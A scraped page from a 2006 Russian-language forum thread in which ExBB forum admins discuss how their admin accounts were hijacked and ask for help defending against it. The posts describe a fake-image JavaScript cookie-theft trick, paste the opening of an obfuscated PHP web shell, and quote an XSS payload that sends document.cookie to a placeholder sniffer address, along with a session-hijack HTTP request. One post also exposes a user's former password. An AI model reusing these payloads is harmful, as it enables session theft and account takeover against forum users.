Strict Standards: Resource ID#18 used as offset, casting to integer (18) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#24 used as offset, casting to integer (24) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#26 used as offset, casting to integer (26) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401

Strict Standards: Resource ID#27 used as offset, casting to integer (27) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/fm.class.php on line 401
ТвойWeb :: Взлом учетных записей [6]

Качественный Европейский хостинг	Форум для чайников
	Чат на форуме Помощь Поиск Пользователи

Здравствуйте Гость ( Вход · Регистрация · Правила форума )

Забыли пароль?

Взлом учетных записей

ТвойWeb » ExBB » ExBB :: Архив » ExBB - лучший форум на файлах

Страниц (7): « 1 2 3 4 5 [6] 7 »

Описание: Взлом учетных записей

Поиск в теме | Версия для печати

TvoyWeb	Отправлено: 10 Декабря, 2006 - 23:25:42
Главный здесь Покинул форум Сообщений всего: 7072 Дата рег-ции: Нояб. 2003 Откуда: Tashkent Uz Карма 52	cosc пишет: Скажите, как это понимать? Это спамерский бот пытался отправить свое сообщение в форме авторизации cosc пишет: C212121Tv_ - пароль пользователя Сaлтыkоff. Теперь конечно он сменил. Здесь показывается неверно введенный пароль.

cosc	Отправлено: 11 Декабря, 2006 - 05:46:29
Full Member Покинул форум Сообщений всего: 188 Дата рег-ции: Апр. 2006 Карма 2	TvoyWeb Ситуация тут у нас неожиданно резко усложнилась. Так или иначе этот хакер уже умудрился взломать учетки сразу 2 админов, несмотря на то, что пароли были вроде тех, что у Салтыkoff. Может посоветуете, в каком направлении копать?

TvoyWeb	Отправлено: 11 Декабря, 2006 - 09:21:52
Главный здесь Покинул форум Сообщений всего: 7072 Дата рег-ции: Нояб. 2003 Откуда: Tashkent Uz Карма 52	cosc На днях выяснилось, (это не есть дыра форума, это глюки некоторых версий IE) можно загрузить файл с html кодом и обозвать его jpg, загрузить на форум. Форум не распознает в нем картинку и на страницу он будет выводиться как прикрепленный файл. Но после клика по ссылке закачать файл этот файл просто открывается в IE и исполняется JavaScript код который отсылает куки на снифер. остальное дело техники. Например мой IE не такой то есть он не исполняет кода а показывает как картинку. Как правило такой подход к взлому нацелен на то, что админ юзает дырявый IE и кликнет по ссылке. Отсюда вывод ПЕРЕСТАНЬТЕ юзать глючный IE!

cosc	Отправлено: 11 Декабря, 2006 - 09:53:01
Full Member Покинул форум Сообщений всего: 188 Дата рег-ции: Апр. 2006 Карма 2	TvoyWeb Я Maxthon использую на движке IE, не знаю актуально такое или нет.

ETC	Отправлено: 11 Декабря, 2006 - 10:05:18
Flash-coder Покинул форум Сообщений всего: 5275 Дата рег-ции: Дек. 2003 Откуда: TimeZero Карма 26	TvoyWeb Но дырку-то закрой! В смысле, достаточно просто проверять контент файла на наличие тега script и запретить заливку — пусть архивом код прикладывают.

cosc	Отправлено: 11 Декабря, 2006 - 10:16:48
Full Member Покинул форум Сообщений всего: 188 Дата рег-ции: Апр. 2006 Карма 2	Кстати, тот шел, который залили первым, он начинается с такого: CODE: <?php $language='ru'; $auth = 0; $name='d41d8cd98f00b204e9800998ecf8427e'; $pass='d41d8cd98f00b204e9800998ecf8427e'; eval(gzinflate(base64_decode('7b1pcxtJkiD6WTTTf8hCswtACQRxkgQpssSb4E0QPCUtO4FMAikmjkICJMEq/bd Такое ощущение, что он прошел перекадировку форумом.\n\n(Добавление) А скажите, по этому заголовку можно чего-нибудь полезное узнать, типа кто закачал и все такое?

ETC	Отправлено: 11 Декабря, 2006 - 10:32:06
Flash-coder Покинул форум Сообщений всего: 5275 Дата рег-ции: Дек. 2003 Откуда: TimeZero Карма 26	Это зашифрованный шел просто.

cosc	Отправлено: 19 Декабря, 2006 - 00:48:40
Full Member Покинул форум Сообщений всего: 188 Дата рег-ции: Апр. 2006 Карма 2	Нет, похоже эта история еще не закончилась. Вчера у меня сменили пароль. И написали от моего имени сообщение. Такое ощущение, что этот хакер имеет доступ в админку, потому что по-другому я просто не представляю, как можно сменить пароль. НЕльзя ли ввести логи адмнки, что бы в них записывалось каждое посещение админи?

TvoyWeb	Отправлено: 19 Декабря, 2006 - 12:09:01
Главный здесь Покинул форум Сообщений всего: 7072 Дата рег-ции: Нояб. 2003 Откуда: Tashkent Uz Карма 52	cosc пишет: НЕльзя ли ввести логи адмнки, что бы в них записывалось каждое посещение админи? Это уже сделано но в новой версии. Так что потерпите малость. Проверь все папки на форуме и сайте, может где еще есть шел.

cosc	Отправлено: 19 Декабря, 2006 - 12:51:28
Full Member Покинул форум Сообщений всего: 188 Дата рег-ции: Апр. 2006 Карма 2	Вот тут один пользователь написал следующее: [video]http://1.ru e=`[/video]` style=display:none;background:url(javascript:document.images[12].src="http://адрес_сниффера.cgi?"+document.cookie) Lol <div class='postcolor'> <embed width="400" height="300" src=http://1.ru e=` type="application/x-shockwave-video">` style=display:none;background:url(javascript:document.images[12].src="http://адрес_сниффера.cgi?="+document.cookie) <i>L</i>ol </div> ПОДУМАЙТЕ, АДМИНЫ, ДЫРКИ ЗДЕСЬ МОГУТ БЫТЬ. GET http://agtustud.agtu.ru/forum/topic.php?s=1d8809cb4bdf328df72255ed12a60f84&act=modcp&forum== HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Accept-Language: ru User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: forum.web-hack.ru Proxy-Connection: Keep-Alive Cookie: session_id=97b928bab6cdc691336eb1cf507c2ff1; hotlog=1; MT=1; forum_read=a%3A1%3A%7Bi%3A1%3Bi%3A1085772263%3B%7D; member_id=xxxx; pass_hash=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; anonlogin=-1 А ТАК МОЖНО СТАТЬ МОДЕРОМ, НУ ИЛИ АДМИНОМ... Интересно, актуально подобное или нет?

Поиск в теме | Версия для печати

Страниц (7): « 1 2 3 4 5 [6] 7 »

Сейчас эту тему просматривают: 1 (гостей: 1, зарегистрированных: 0, скрытых: 0)

« ExBB - лучший форум на файлах »

Все гости форума могут просматривать этот раздел.
Только администраторы и модераторы могут создавать новые темы в этом разделе.
Только администраторы и модераторы могут отвечать на сообщения в этом разделе.

Форум на AlfaSpace.NET

Powered by ExBB
ExBB FM 1.0 RC1 by TvoyWeb.ru
InvisionExBB Style converted by Markus®

[Script Execution time: 0.0647] [ Gzipped ]

Notice: ob_end_flush(): failed to send buffer of ob_gzhandler (1) in /home/tvoyweb/domains/tvoyweb.ru/public_html/forums/include/page_tail.php on line 33